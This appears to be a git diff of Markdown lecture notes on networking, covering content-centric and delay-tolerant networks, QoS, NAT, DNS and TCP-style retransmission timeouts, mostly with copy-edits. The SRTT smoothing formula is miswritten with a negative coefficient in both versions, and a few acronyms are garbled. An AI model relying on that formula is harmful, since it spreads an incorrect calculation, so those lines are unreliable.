* Anything that hears the interest and has an element of the collection can respond with that data. - Anything that hears the interest and has an element of the collection can respond with that data.
### ICN Transport ### ICN Transport
* Data that matches an interest, *consumes* it. - Data that matches an interest *consumes* it.
* Interest must be re-expressed to get new data. - Interest must be re-expressed to get new data.
* Controlling re-expressions allows for traffic management and congestion control. - Controlling re-expressions allows for traffic management and congestion control.
* Multiple (distinct) interests in the same collection may be expressed - Multiple (distinct) interests in the same collection may be expressed
### ICN Caching ### ICN Caching
* Storage and caching are integral part of the ICN service - Storage and caching are an integral part of the ICN service
* All nodes potentially have caches. Requests for data can be satisfied by any node holding a copy in it's cache. - All nodes potentially have caches. Requests for data can be satisfied by any node holding a copy in its cache.
* ICN combines caching at the network edge with in-network caching. - ICN combines caching at the network edge with in-network caching.
@@ -1,21 +1,23 @@
# Content Centric Networks # Content-Centric Networks
A Brief History of Networking A Brief History of Networking
- Gen 1. The **phone system** (focus on the **wires**) - Gen 1. The **phone system** (focus on the **wires**)
- The utility of the system depends on running wires to every home & office. - The utility of the system depends on running wires to every home & office.
- Wires are the dominant cost. - Wires are the dominant cost.
- A *call* is not the conversation, its the **PATH** between two end-office line cards. - A *call* is not the conversation; it's the **PATH** between two end-office line cards.
- A *phone number* is not the name/address of the caller, its a **program** for the end-office switch fabric to build a path to the destination line card. - A *phone number* is not the name/address of the caller; it's a **program** for the end-office switch fabric to build a path to the destination line card.
- <img src="img/k.png" alt="switch board" style="zoom:50%;" />
- Path building is **non-local** and **encourages centralisation** and **monopoly**. - <img src="img/k.png" alt="switch board" style="zoom:50%;" />
- Calls fail is any element in the path fails so reliability goes down exponentially as the system scales up.
- Data cannot flow until the path is set up so efficiency decreases with setup time. - Path building is **non-local** and **encourages centralisation** and **monopoly**.
- Calls fail if any element in the path fails, so reliability goes down exponentially as the system scales up.
- Data cannot flow until the path is set up so efficiency decreases with setup time.
- Gen 2. The **Internet** (focus on the **endpoints**) - Gen 2. The **Internet** (focus on the **endpoints**)
- Data sent in independent chunks and each chunk contains the name of the final destination. - Data sent in independent chunks and each chunk contains the name of the final destination.
- Nodes forward packets onward using routing tables. - Nodes forward packets onward using routing tables.
- **ARPAnet** was built on top of the existing phone system. - **ARPAnet** was built on top of the existing phone system.
- Gen 3. **dissemination** (focus on the **data**) - Gen 3. **dissemination** (focus on the **data**)
@@ -31,9 +33,9 @@ A Brief History of Networking
###### Cons ###### Cons
- *Connected* is a binary attribute. - *Connected* is a binary attribute.
- Becoming part of the internet requires a globally unique, globally know IP address that's topologically stable on routing time scales. - Becoming part of the internet requires a globally unique, globally known IP address that's topologically stable on routing time scales.
- Connecting is a heavy weight operation - Connecting is a heavyweight operation
- The net struggles with moving nodes - The net struggles with moving nodes
#### Conversation and Dissemination #### Conversation and Dissemination
@@ -41,7 +43,7 @@ Acquiring chunks of data (web pages, emails, videos etc) is not a conversation,
In a dissemination **the data matters**, not the supplier. In a dissemination **the data matters**, not the supplier.
- Data is request by name. - Data is requested by name.
- Anything that hears the request, and has a valid copy can respond. - Anything that hears the request, and has a valid copy can respond.
- The return data is signed, so integrity and association can be validated. - The return data is signed, so integrity and association can be validated.
@@ -63,33 +65,33 @@ Data packets are authenticated with digital signatures.
#### CCN Forwarding #### CCN Forwarding
Consumer *broadcasts* and *interest* over all available communication media The consumer *broadcasts* an *interest* over all available communication media.
- e.g. `get '/parc.com/van/presentation.pdf'` - e.g. `get '/parc.com/van/presentation.pdf'`
- response: `heres '/parc.com/van/presentation.pdf/p1' <data>` - response: `heres '/parc.com/van/presentation.pdf/p1' <data>`
##### Names and Meaning ##### Names and Meaning
* Like IP, CCN nodes imposes no semantics on names - Like IP, CCN nodes impose no semantics on names
* Meaning comes from **application**, **institution** and **global conventions** reflected in prefix forwarding rules. - Meaning comes from **application**, **institution** and **global conventions** reflected in prefix forwarding rules.
* Globally meaningful name leveraging the DNS global naming structure - Globally meaningful name leveraging the DNS global naming structure
* `/parc.com/van/presentation.pdf` - `/parc.com/van/presentation.pdf`
* Local and context sensitive, it refers to different objects depending on the room you're in. - Local and context sensitive, it refers to different objects depending on the room you're in.
* `/thisRoom/projector` - `/thisRoom/projector`
#### Strategy Layer #### Strategy Layer
* When you do not care who you are talking to, you don't care if they change - When you do not care who you are talking to, you don't care if they change
* When you are not having a conversation, there's no need to migrate conversation state. - When you are not having a conversation, there's no need to migrate conversation state.
* Multi-point gives you multi-interface for free. - Multi-point gives you multi-interface for free.
* When all communication is locally flow balanced, your stack knows exactly whats working and how well. - When all communication is locally flow-balanced, your stack knows exactly what's working and how well.
In the current Internet, Quality of Service (QoS) Problems are highly localised In the current Internet, Quality of Service (QoS) Problems are highly localised
* Roughly half the problems are from serial dependencies created by queues - Roughly half the problems are from serial dependencies created by queues
* The other half are caused from a lack of receiver based control over bottle-necked links. - The other half are caused by a lack of receiver-based control over bottlenecked links.
Unlike IP, CCN is **local**, don't have queues and receivers have complete control Unlike IP, CCN is **local**, doesn't have queues, and gives receivers complete control.
![img](img/n.png) ![img](img/n.png)
+57 -57
View File
@@ -8,19 +8,19 @@
> **Characteristics** > **Characteristics**
> >
> * High intermittent connectivity > - High intermittent connectivity
> * Extremely long message travel time > - Extremely long message travel time
> * Delay: finite speed of light > - Delay: finite speed of light
> * Low Transmission reliability > - Low Transmission reliability
> * Inaccurate position > - Inaccurate position
> * Limited visibility > - Limited visibility
> * Low asymmetric Data Rate > - Low asymmetric Data Rate
> >
> **Security** > **Security**
> >
> - CCSDS protocol > - CCSDS protocol
> - space End to End security > - space End to End security
> - space end to end reliability > - space end to end reliability
##### Military ##### Military
@@ -28,12 +28,12 @@
> >
> **Characteristics** > **Characteristics**
> >
> * High intermittent connectivity > - High intermittent connectivity
> * Mobility, destruction, noise & attacks, interference > - Mobility, destruction, noise & attacks, interference
> * Low transmission reliability > - Low transmission reliability
> * positioning inaccuracy > - positioning inaccuracy
> * limited visibility > - limited visibility
> * Low data rate > - Low data rate
> >
> **Security** > **Security**
> >
@@ -43,68 +43,68 @@
##### Rural Areas ##### Rural Areas
>Providing internet connectivity to rural/developing areas > Providing internet connectivity to rural/developing areas
> >
>**Characteristics** > **Characteristics**
> >
>- Intermittent connectivity > - Intermittent connectivity
>- Mobility - sparse development > - Mobility - sparse development
>- High propagation delay > - High propagation delay
>- Asymmetric data rate > - Asymmetric data rate
> >
>![img](img/p.png) > ![img](img/p.png)
> >
>**Security** > **Security**
> >
>- Standard cryptographic techniques such as PKI and transparent encrypted file systems > - Standard cryptographic techniques such as PKI and transparent encrypted file systems
- Disaster struck areas - Disaster-struck areas
- Disconnected kiosks in rural areas - Disconnected kiosks in rural areas
- Remote sensing applications - Remote sensing applications
But also But also
- Bulk data distribution in urban areas - Bulk data distribution in urban areas
- Sharing of individual contents in urban areas - Sharing of individual content in urban areas
- Mobile location-aware sensing application - Mobile location-aware sensing applications
- Social mobile applications - Social mobile applications
#### DTN Security Goals #### DTN Security Goals
Due to the resource-causticity that DTNs have, the focus is on protecting the DTN infrastructure from unauthorised access and use. Due to the resource scarcity of DTNs, the focus is on protecting the DTN infrastructure from unauthorised access and use.
* Prevent **access** by unauthorised applications. - Prevent **access** by unauthorised applications.
* Prevent unauthorised applications from asserting control over DTN infrastructure. - Prevent unauthorised applications from asserting control over DTN infrastructure.
* Prevent authorised applications from sending bundles at a rate or class of service for which they **don't have permissions for**. - Prevent authorised applications from sending bundles at a rate or class of service for which they **don't have permission**.
* Detect and discard bundles that were sent from unauthorised applications/users. - Detect and discard bundles that were sent from unauthorised applications/users.
* Detect and discard bundles who's headers have been modified. - Detect and discard bundles whose headers have been modified.
* Detect and discard compromised entities. - Detect and discard compromised entities.
Secondary emphasis is on providing optional end-to-end security services to bundle applications. Secondary emphasis is on providing optional end-to-end security services to bundle applications.
#### DTN Security Challenges #### DTN Security Challenges
* High round-trip times and disconnections - High round-trip times and disconnections
* Do not allow frequent distribution of a large number of certificates and encryption keys end-to-end. - Do not allow frequent distribution of a large number of certificates and encryption keys end-to-end.
* More scalable to use user's keys and credentials at neighbouring or nearby nodes. - More scalable to use users' keys and credentials at neighbouring or nearby nodes.
* Delays or loss of connectivity to a key or certificate server - Delays or loss of connectivity to a key or certificate server
* Multiple certificate authorities desirable but not sufficient and certificate revocation not appropriate - Multiple certificate authorities desirable but not sufficient and certificate revocation not appropriate
* Long delays - Long delays
* Messages may be valid for days/weeks, so message expiration may not be able to be depended on to rid the network of unwanted messages as efficiently as in other types of networks. - Messages may be valid for days/weeks, so message expiration may not be able to be depended on to rid the network of unwanted messages as efficiently as in other types of networks.
* Constrained Bandwidth - Constrained Bandwidth
* Need to minimise the cost of security in terms of network overhead (header bits). - Need to minimise the cost of security in terms of network overhead (header bits).
###### Traditional PKI not applicable ###### Traditional PKI not applicable
* Traditional symmetric cryptography approaches are not suitable for DTNs for two major reasons - Traditional symmetric cryptography approaches are not suitable for DTNs for two major reasons
* In PKI a user authenticates another users public key using a certificate - In PKI, a user authenticates another user's public key using a certificate
* This is not possible without online access to the receivers public key or certificates - This is not possible without online access to the receiver's public key or certificates
* PKIs implement key revocation based on frequently updated online certificate revocation lists - PKIs implement key revocation based on frequently updated online certificate revocation lists
* In the absence of instant online access to CAs servers, a receiver cannot authenticate the sender's certificate. - In the absence of instant online access to CAs' servers, a receiver cannot authenticate the sender's certificate.
###### Identity Based Cryptography not applicable ###### Identity Based Cryptography not applicable
Identity Based Cryptography (IBC) schemes where the public key of each entity is replaced by its identity and associated public formatting policies are not suitable for the security in DTNs Identity-Based Cryptography (IBC) schemes, where the public key of each entity is replaced by its identity and associated public formatting policies, are not suitable for security in DTNs.
- IBC does not solve the key management problem in DTNs - IBC does not solve the key management problem in DTNs
- It is not scalable because it assumes that a user must know the public parameters for all the trusted parties. - It is not scalable because it assumes that a user must know the public parameters for all the trusted parties.
@@ -112,20 +112,20 @@ Identity Based Cryptography (IBC) schemes where the public key of each entity is
###### Mobile ad hoc Key Management Proposals not applicable ###### Mobile ad hoc Key Management Proposals not applicable
- Virtual Certificate Authority - Virtual Certificate Authority
- Not applicable due to no trusted third parties - Not applicable due to the absence of trusted third parties
- Certificate chaining based on pretty good privacy (PGP) - Certificate chaining based on pretty good privacy (PGP)
- Not applicable due to insufficient density of certificate graphs - Not applicable due to insufficient density of certificate graphs
- Peer-to-peer key management based on mobilty - Peer-to-peer key management based on mobility
- Not applicable due to certificate revocation mechanism - Not applicable due to certificate revocation mechanism
#### Existing Mandatory DTN Security #### Existing Mandatory DTN Security
Based on the *bundle* protocol Based on the *bundle* protocol
* Hop-by-hop bundle integrity - Hop-by-hop bundle integrity
* Hop-by-hop bundle sender authentication - Hop-by-hop bundle sender authentication
* Access Control (only legit users with right permissions) - Access Control (only legit users with right permissions)
* Limited protection from DoS attacks - Limited protection from DoS attacks
![img](img/q.png) ![img](img/q.png)
+17 -18
View File
@@ -1,4 +1,4 @@
# Enabling Real-Time communications and Services in Heterogeneous Networks of Drones and Vehicles # Enabling Real-Time Communications and Services in Heterogeneous Networks of Drones and Vehicles
### Real World Experiments ### Real World Experiments
@@ -6,35 +6,34 @@
- Agricultural context in UK - Agricultural context in UK
- The production of potatoes or livestock has always been a major part of farming - The production of potatoes or livestock has always been a major part of farming
- There has always been a need for farmers to be able to observe their field crops or animals as often as possible so that they are informed quickly about potential deep rooted problems in the fields. - There has always been a need for farmers to be able to observe their field crops or animals as often as possible so that they are informed quickly about potential deep-rooted problems in the fields.
Enable mobile reliable multi-hop DTN communications (in field near Nottingham) Enable reliable mobile multi-hop DTN communications (in a field near Nottingham).
- 2 Flying drones - 2 Flying drones
- 1 Vehicle - 1 Vehicle
- 2 Static ground sensing nodes - 2 Static ground sensing nodes
- Raspberry Pis - Raspberry Pis
- These capture and send data to the drones, which forward it to a node with higher computational output - These capture and send data to the drones, which forward it to a node with higher computational output
The two static sensing nodes are deployed on two different sides of the field out of reach of each other while the drone acts as a intermediaries. The two static sensing nodes are deployed on two different sides of the field, out of reach of each other, while the drone acts as an intermediary.
All sensing nodes could measure All sensing nodes could measure
- Air temp - Air temperature
- wind speed - Wind speed
- soil temp - Soil temperature
We measure average edge to edge (E2E) delays of content query and dissemination in the network We measure average edge-to-edge (E2E) delays of content queries and dissemination in the network.
- Two drones and one vehicle (3 intermediaries) result in lower delays - Two drones and one vehicle (3 intermediaries) result in lower delays
#### Smart City Applications #### Smart City Applications
- More focused on single hop - More focused on single-hop communication
- 1 Hovering drone (publisher) - 1 Hovering drone (publisher)
- Moving vehicle (subscriber) - Moving vehicle (subscriber)
- The drone continuously sends information such as sensors readings, street images, traffic videos to the vehicle which monitors road conditions - The drone continuously sends information such as sensor readings, street images and traffic videos to the vehicle, which monitors road conditions
- Single hop communications is significantly affected by physical obstructions - Single-hop communication is significantly affected by physical obstructions
- Therefore the latency went down in suburbs compared to city centres - Therefore the latency went down in suburbs compared to city centres
- Height of the drone is important as well - Height of the drone is important as well
+35 -35
View File
@@ -7,7 +7,7 @@ This is about **resource management**
- **Supply** - Available link capacity on path - **Supply** - Available link capacity on path
- **Demand** - Host transmitting and receiving traffic - **Demand** - Host transmitting and receiving traffic
- **Elastic** - capacity reduces -> demand is scaled back - **Elastic** - capacity reduces -> demand is scaled back
- Hosts stop sending / send less - Hosts stop sending / send less
- **Inelastic** - applications can’t handle this - **Inelastic** - applications can’t handle this
TCP manages resource usage based on observed loss and latency TCP manages resource usage based on observed loss and latency
@@ -19,8 +19,8 @@ If capacity > demand, there is no need for quality of service
If capacity < demand, we need to keep queuing minimal If capacity < demand, we need to keep queuing minimal
- As queuing directly impacts latency, jitter and loss - As queuing directly impacts latency, jitter and loss
- In stable networks - In stable networks
- **Jitter**: The difference in delays, a measure of stability - **Jitter**: The difference in delays, a measure of stability
#### IP Type of Service #### IP Type of Service
@@ -59,76 +59,76 @@ Precedence
### Differentiated Services (DiffServ) ### Differentiated Services (DiffServ)
- Operates on *traffic aggregates* - Operates on *traffic aggregates*
- Label packets with desired class via ToS - Label packets with desired class via ToS
- Routers apply different queuing as operator sees fit - Routers apply different queuing as operator sees fit
- Four service classes, or *per-hop behaviour* - Four service classes, or *per-hop behaviour*
- **Default**: best effort - **Default**: best effort
- No QoL applied - No QoL applied
- **Expedited Forwarding**: low delay, loss & jitter - **Expedited Forwarding**: low delay, loss & jitter
- **Assured Forwarding**: low loss if within rate - **Assured Forwarding**: low loss if within rate
- **Class Selector**: use ToS precedence bits - **Class Selector**: use ToS precedence bits
##### Problems ##### Problems
- End to end semantics - End-to-end semantics
- Mapping to service level agreement - Mapping to service level agreement
- If an internet company sells a network with a certain speed, this might have legal repercussions if QoS are enacted - If an internet company sells a network with a certain speed, this might have legal repercussions if QoS is enacted
- Mapping to application demands - Mapping to application demands
### Integrated Services (IntServ) ### Integrated Services (IntServ)
- Operates on explicitly signalled *flows* - Operates on explicitly signalled *flows*
- Think phone switchboards - Think phone switchboards
- The network signals exactly what it can and can’t do to the destination nodes - The network signals exactly what it can and can’t do to the destination nodes
- Flow setup specifies some quality of service - Flow setup specifies some quality of service
- Routers perform **C**onnection **A**dmission **C**ontrol - Routers perform **C**onnection **A**dmission **C**ontrol
- CDA can accept and reject traffic based on whether or not the route/path is available - CDA can accept and reject traffic based on whether or not the route/path is available
##### Problems ##### Problems
- Complexity - Complexity
- Hard to scale - Hard to scale
- Mapping requirements to parameters - Mapping requirements to parameters
- This was easier when ATM did it as they owned all the infrastructure - This was easier when ATM did it as they owned all the infrastructure
- Whereas now it is difficult to map across all different companies - Whereas now it is difficult to map across all different companies
- Per-flow state - Per-flow state
- Extremely difficult - Extremely difficult
## NAT ## NAT
### Address Shortages ### Address Shortages
**IPv4** supports 32 bit addresses **IPv4** supports 32-bit addresses
- 95% allocated already (440,000 netblocks) - 95% allocated already (440,000 netblocks)
**IPv6** supports 128-bit address **IPv6** supports 128-bit addresses
- Loads of addresses :white_check_mark: - Loads of addresses :white_check_mark:
- Routing protocols need to ported :negative_squared_cross_mark: - Routing protocols need to be ported :negative_squared_cross_mark:
- Associated services needing to move :negative_squared_cross_mark: - Associated services needing to move :negative_squared_cross_mark:
### Network Address Translation ### Network Address Translation
Because IPv6 did not magically solve address shortage problem and not all routers are ipv6 aware, we had to rely on NAT. Because IPv6 did not magically solve the address shortage problem and not all routers are IPv6-aware, we had to rely on NAT.
- Private Addressing, `RFC1918` - Private Addressing, `RFC1918`
- `172.16/12`, `192.168/16`, `10/8` - `172.16/12`, `192.168/16`, `10/8`
- Devices with these local IPs should never be externally routed - Devices with these local IPs should never be externally routed
- Not for security reasons - just for getting more addresses - Not for security reasons - just for getting more addresses
- Traditional NAT, `RFC3022` is the standard - Traditional NAT, `RFC3022` is the standard
- Use private addresses internally (within the local network) - Use private addresses internally (within the local network)
- Map into a (small) set of routable addresses - Map into a (small) set of routable addresses
- Use source ports to distinguish connections - Use source ports to distinguish connections
- For large scale **carrier grade NAT** [`RFC6598`] on `100.64/10` - For large-scale **carrier-grade NAT** [`RFC6598`] on `100.64/10`
#### Implementation #### Implementation
- Requires IP, TCP/UDP header rewriting - Requires IP, TCP/UDP header rewriting
- Addresses, ports and checksums all need to be recalculated - Addresses, ports and checksums all need to be recalculated
- Behaviours - Behaviours
- Network Address Translation - Network Address Translation
- Network Address and Port Translation - Network Address and Port Translation
###### Full Cone ###### Full Cone
@@ -136,7 +136,7 @@ Because IPv6 did not magically solve address shortage problem and not all router
ea:ep - NAT address : NAT port ea:ep - NAT address : NAT port
``` ```
When client receives packet from server 1 `da:dp`, the NAT translates the NAT address `ea:ep` to the clients internet address and port `ia:ip`. When the client receives a packet from server 1 `da:dp`, the NAT translates the NAT address `ea:ep` to the client's internet address and port `ia:ip`.
###### Address Restricted Cone NAT ###### Address Restricted Cone NAT
@@ -148,4 +148,4 @@ If the router receives a packet from a bad IP or bad port, it will be dropped.
###### Symmetric NAT ###### Symmetric NAT
Here the internal address is obfuscated from the external servers, same client can use different ports for different communications. Here, the internal address is obfuscated from the external servers. The same client can use different ports for different communications.
+37 -37
View File
@@ -1,6 +1,6 @@
# Naming # Naming
IPs are not human readable. IPs are not human-readable.
Not always the appropriate granularity Not always the appropriate granularity
@@ -10,11 +10,11 @@ Not always the appropriate granularity
A file maps names to addresses A file maps names to addresses
- Unix & Linux - Unix & Linux
- `/etc/hosts` - `/etc/hosts`
- Windows - Windows
- `C:\Windows\System32\drivers\etc\hosts` - `C:\Windows\System32\drivers\etc\hosts`
These are simple but neither automatic or scalable which led to **DNS**. These are simple but neither automatic nor scalable, which led to **DNS**.
- Was initially `RFC882` - Was initially `RFC882`
- Now is `RFC1035, 1987` - Now is `RFC1035, 1987`
@@ -22,24 +22,24 @@ These are simple but neither automatic or scalable which led to **DNS**.
DNS is a consistent namespace DNS is a consistent namespace
- No reference to addresses, routes etc - No reference to addresses, routes etc
- Is hierarchical, distributed & cache - Is hierarchical, distributed and cached
- All of which to help with scalability - All of which help with scalability
- **Federated** - sources control trade-off - **Federated** - sources control trade-off
- This just means DNS are worldwide - This just means DNS is worldwide
- **Flexible** - many record - **Flexible** - many records
- Simple client-server name resolution protocol - Simple client-server name resolution protocol
#### Components #### Components
- *Domain name space* and *resource records* - *Domain name space* and *resource records*
- Tree structured name space - Tree-structured name space
- Data associated with names - Data associated with names
- *Name server* - *Name server*
- Contains records for a sub tree - Contains records for a subtree
- May cache information about any part of the tree - May cache information about any part of the tree
- Resolver - Resolver
- Extract information from tree upon client requests - Extracts information from the tree upon client requests
- `gethostbyname()` - `gethostbyname()`
![img](img/aa.png) ![img](img/aa.png)
@@ -48,26 +48,26 @@ DNS is a consistent namespace
- Ultimate authority with the US Dept. of commerce (NITA) - Ultimate authority with the US Dept. of commerce (NITA)
- Managed by IANA, operated by ICANN, maintained by Verisign - Managed by IANA, operated by ICANN, maintained by Verisign
- Started with only thirteen root server clusters - Started with only thirteen root server clusters
- Now much more - Now many more
- Top level Domains, TLDs - Top-level domains, TLDs
- Operated by registrars, delegated by ICANN - Operated by registrars, delegated by ICANN
- Delegate zones to other registrars - Delegate zones to other registrars
- and so on down the hierarchy - and so on down the hierarchy
- Eventually customer rents a name - their **zone** - Eventually, a customer rents a name - their **zone**
- Registrar installs appropriate *resource records* - Registrar installs appropriate *resource records*
- Associated with names within the zone - Associated with names within the zone
#### Query #### Query
- Query generated by resolver - Query generated by resolver
- e.g. call to `gethostbyname()`, `gethostbyaddr()` - e.g. call to `gethostbyname()`, `gethostbyaddr()`
- Carried in single UDP/53 packet - Carried in single UDP/53 packet
- Or more rarely TCP/53 in case of truncation - Or more rarely TCP/53 in case of truncation
- UDP is not smart and therefore does not follow traffic routing (it is selfish) - UDP is not smart and therefore does not follow traffic routing (it is selfish)
- It is beneficial for the internet as a whole to use UDP sometimes - It is beneficial for the internet as a whole to use UDP sometimes
- Header followed by question - Header followed by question
- ID, Q/R, opcode, AA/TC/RD/RA, response code, counts - ID, Q/R, opcode, AA/TC/RD/RA, response code, counts
- Query type, query class, query name - Query type, query class, query name
Response consists of three RRsets following the header and question Response consists of three RRsets following the header and question
@@ -113,27 +113,27 @@ nott.ac.uk. 3600 IN MX 2 mx192.emailfiltering.com.
nott.ac.uk 3600 IN MX 3 mx193.emailfiltering.com. nott.ac.uk 3600 IN MX 3 mx193.emailfiltering.com.
``` ```
What happens when the resolver queries a server that doesn't know the answer? two solutions: What happens when the resolver queries a server that doesn't know the answer? There are two solutions:
1. **Iterative** (required) 1. **Iterative** (required)
- Server responds indicating who to ask next - Server responds indicating who to ask next
- This method is slower and more difficult to retrieve an answer - This method is slower and more difficult to retrieve an answer
1. **Recursive** (optional) 1. **Recursive** (optional)
- Server generates a new query to the next server - Server generates a new query to the next server
![img](img/ab.png) ![img](img/ab.png)
#### Load Balancing #### Load Balancing
DNS may have multiple servers, when a query comes various algorithms can be used to choose the best one, this can be geographical location. DNS may have multiple servers. When a query arrives, various algorithms can be used to choose the best one, for example, based on geographical location.
#### Operational & Security Issues #### Operational & Security Issues
- Usually need primary and secondary servers - Usually need primary and secondary servers
- Separate IP netblocks, physical networks - more robust - Separate IP netblocks, physical networks - more robust
- DNS is a *very* common single point of failure - DNS is a *very* common single point of failure
- Cache poisoning - Cache poisoning
- Caching and soft-state means bad data propagates and can persist for some time - Caching and soft-state means bad data propagates and can persist for some time
- Even if through simple mistakes (or of course malicious attacks) - Even if through simple mistakes (or of course malicious attacks)
- Man-in-the-middle attacks - Man-in-the-middle attacks
- Can happen with both iterative & recursive queries - Can happen with both iterative & recursive queries
+59 -59
View File
@@ -2,9 +2,9 @@
Achieving reliability: Achieving reliability:
- Re-transmitting lost data - Retransmitting lost data
- This is done by detecting lost via explicit acknowledgment - This is done by detecting loss via explicit acknowledgement
- These can be positive or negative - These can be positive or negative
### Stop ‘n’ Wait ### Stop ‘n’ Wait
@@ -16,20 +16,20 @@ Simplest possible paradigm
![img](img/a.jpeg) ![img](img/a.jpeg)
This has really poor performance in high latency and uses high bandwidth (half the bandwidth is overhead (acknowledgements)) This has really poor performance at high latency and uses high bandwidth (half the bandwidth is overhead from acknowledgements).
**Rate control**: Never sending too fast for the network **Rate control**: Never sending too fast for the network
**Sliding window**: allow unacknowledged data in flight (data to be sent) **Sliding window**: allow unacknowledged data in flight (data to be sent)
**Retransmission TimeOut**: how long to wait to decide a segment is lost **Retransmission Timeout**: how long to wait before deciding a segment is lost
- This requires estimates of dynamic quantities - This requires estimates of dynamic quantities
- Permit N segments in flight - Permit N segments in flight
- Timeout implies loss - Timeout implies loss
- Retransmit from lost packet onward - Retransmit from lost packet onward
- This is bad as imagine if only packet 3 is lost out of 5, this means client will resend 3-5. - This is bad: imagine if only packet 3 is lost out of 5. This means the client will resend packets 3-5.
##### Congestion Collapse ##### Congestion Collapse
@@ -37,13 +37,13 @@ When network load is too high, it causes *congestion collapse*
Why? Why?
- The routers buffers fill up, traffic is discarded, hosts retransmit - The routers' buffers fill up, traffic is discarded, and hosts retransmit
- Retransmit rates increase since more data was lost - Retransmit rates increase since more data was lost
- This was solved in “Congestion Avoidance and Control” - This was solved in “Congestion Avoidance and Control”
#### Stability of the Internet #### Stability of the Internet
Flows and protocols **include some sort of congestion control** and adaptation so that they moderate their bandwidth use, limit packet loss as well as get approximately fair share of available network bandwidth Flows and protocols **include some sort of congestion control** and adaptation so that they moderate their bandwidth use, limit packet loss and get an approximately fair share of available network bandwidth.
1. **Responsiveness** defined as a number of round-trip times of sustained congestion required to reduce the rate by half 1. **Responsiveness** defined as a number of round-trip times of sustained congestion required to reduce the rate by half
2. **Stability and smoothness** defined as the largest reduction of the sending rate in one round trip time in a steady state scenario 2. **Stability and smoothness** defined as the largest reduction of the sending rate in one round trip time in a steady state scenario
@@ -51,29 +51,29 @@ Flows and protocols **include some sort of congestion control** and adaptation s
Mimicking TCP behaviour for multimedia congestion control results in fairness towards TCP but also in significant oscillations in bandwidth Mimicking TCP behaviour for multimedia congestion control results in fairness towards TCP but also in significant oscillations in bandwidth
- Multimedia streaming applications need to **have much lower variation at throughput** over time compared to TCP to result in relatively smooth sending rates that are of importance to the end-user perceived quality. - Multimedia streaming applications need to **have much lower variation in throughput** over time compared to TCP to result in relatively smooth sending rates that are important to the quality perceived by the end user.
- The penalty for having smoother throughput than TCP while competing for bandwidth is that multimedia congestion control responds slower than TCP to changes in available bandwidth. - The penalty for having smoother throughput than TCP while competing for bandwidth is that multimedia congestion control responds slower than TCP to changes in available bandwidth.
- Thus, if multimedia traffic wants smooth throughput, it needs to avoid TCP’s halving of the sending rate in response to a single packet drop. - Thus, if multimedia traffic wants smooth throughput, it needs to avoid TCP’s halving of the sending rate in response to a single packet drop.
###### Packet Loss ###### Packet Loss
- When choosing the method for packet loss detection, it is important to choose a method that **detects packet losses as early and accurately as possible** - When choosing the method for packet loss detection, it is important to choose a method that **detects packet losses as early and accurately as possible**
- Incorrect detection & late packet delivery can lead to incorrect packet loss estimation - Incorrect detection & late packet delivery can lead to incorrect packet loss estimation
- This causes unresponsive & unfair behaviour - This causes unresponsive & unfair behaviour
- Calculating packet loss rates can be done over various lengths of time intervals. - Packet loss rates can be calculated over time intervals of various lengths.
- Shorter intervals result in more responsive behaviour but are more susceptible to noise - Shorter intervals result in more responsive behaviour but are more susceptible to noise
- Longer intervals = smoother but less responsive - Longer intervals = smoother but less responsive
- It is important to find a balance - It is important to find a balance
- In order to guarantee sufficient responsiveness to congestion and preserver smoothness, methods for detecting & calculating packet loss must be chosen carefully. - In order to guarantee sufficient responsiveness to congestion and preserve smoothness, methods for detecting and calculating packet loss must be chosen carefully.
1. What mechanism can be used for packet loss detection? 1. What mechanism can be used for packet loss detection?
2. What algorithm can be used for packet loss rate calculation? 2. What algorithm can be used for packet loss rate calculation?
3. Where can packet loss detection and calculation happen? 3. Where can packet loss detection and calculation happen?
###### Approach ###### Approach
- All sent packets are marked with consecutive sequence of numbers - All sent packets are marked with a consecutive sequence of numbers
- When a packet is sent a timeout value for this packet is computed and an entry containing the sequence number and the timeout value is inserted into a list and kept there until packet delivery is acknowledged or considered to be lost - When a packet is sent a timeout value for this packet is computed and an entry containing the sequence number and the timeout value is inserted into a list and kept there until packet delivery is acknowledged or considered to be lost
- If the timeout expires before the packet is acknowledged, the corresponding packet is considered to be lost - If the timeout expires before the packet is acknowledged, the corresponding packet is considered to be lost
- In order to adapt to varying and unpredictable network conditions, the timeout is not fixed, but computed based on one of the algorithms for TCP timeout computation - In order to adapt to varying and unpredictable network conditions, the timeout is not fixed, but computed based on one of the algorithms for TCP timeout computation
##### Timeout Based Approaches ##### Timeout Based Approaches
@@ -82,31 +82,31 @@ This is mostly used for multimedia situations
RTT - round trip times RTT - round trip times
- Before the first packet is ACK and RTT measurement is made, the sender sets the TIMEOUT to a certain initial value - Before the first packet is acknowledged and an RTT measurement is made, the sender sets the TIMEOUT to a certain initial value
- This value is usually **2.5-3 seconds for TCP** - This value is usually **2.5-3 seconds for TCP**
- For real time interactive multimedia traffic, the timeout value should be set to **0.5 seconds** as this is the time where audio delay affects media - For real-time interactive multimedia traffic, the timeout value should be set to **0.5 seconds** as this is the time when audio delay affects media
- When the first `RTT` measurement is taken the sender sets the smoothed `RTT` (`SRTT`), `RTT` variance (`RTTVAR`) and `TIMEOUT` in the following way - When the first `RTT` measurement is taken the sender sets the smoothed `RTT` (`SRTT`), `RTT` variance (`RTTVAR`) and `TIMEOUT` in the following way
- `SRTT = RTT` - `SRTT = RTT`
- `RTTVAR = RTT/2` - `RTTVAR = RTT/2`
- `TIMEOUT = `$\mu\cdot$`SRTT + 4*RTTVAR` - `TIMEOUT = `$\mu\cdot$`SRTT + 4*RTTVAR`
- Where $\mu$ is a constant, which in this implementation is 1.08 (obtained experimentally) - Where $\mu$ is a constant, which in this implementation is 1.08 (obtained experimentally)
- When subsequent `RTT` measurements are made the sender sets the `RTTVAR`, `SRTT`, TIMEOUT - When subsequent `RTT` measurements are made, the sender sets `RTTVAR`, `SRTT` and `TIMEOUT`
- `RTTVAR`$= (1 - \frac{1}{4}) \times$`RTTVAR`$+ \frac14 \times |$`SRTT`$-$`RTT`$|$ - `RTTVAR`$= (1 - \frac{1}{4}) \times$`RTTVAR`$+ \frac14 \times |$`SRTT`$-$`RTT`$|$
- `SRTT`$= (-\frac18)\times$`SRTT`$+\frac18\times$`RTT` - `SRTT`$= (-\frac18)\times$`SRTT`$+\frac18\times$`RTT`
- `TIMEOUT`$= \mu\times$`SRTT`$+ 4\times$`RTTVAR` - `TIMEOUT`$= \mu\times$`SRTT`$+ 4\times$`RTTVAR`
###### Packet loss rate calculation ###### Packet loss rate calculation
- Real time interactive multimedia approaches typically use the **weighted Loss Interval Average (WLIA)** - Real-time interactive multimedia approaches typically use the **weighted Loss Interval Average (WLIA)**
